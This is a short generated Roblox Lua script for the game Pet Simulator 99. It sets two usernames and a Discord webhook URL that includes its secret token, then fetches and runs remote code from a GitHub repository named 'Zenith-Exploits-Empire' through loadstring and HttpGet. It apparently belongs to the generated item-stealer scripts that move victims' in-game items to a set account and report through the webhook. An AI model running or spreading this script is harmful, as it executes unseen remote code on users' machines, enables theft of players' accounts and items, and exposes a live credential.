-- Generated by Generator V5.2
Username = "BellaTvTT"
Username2 = "BellaTvTT"
Webhook = "https://discord.com/api/webhooks/1364991061688193034/tD-XnRni7TDvLGh3gRb8kdWCl21QWDHv9vzhCEdW9o4joTjJzNIbrafb563m6z4g6uyR"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()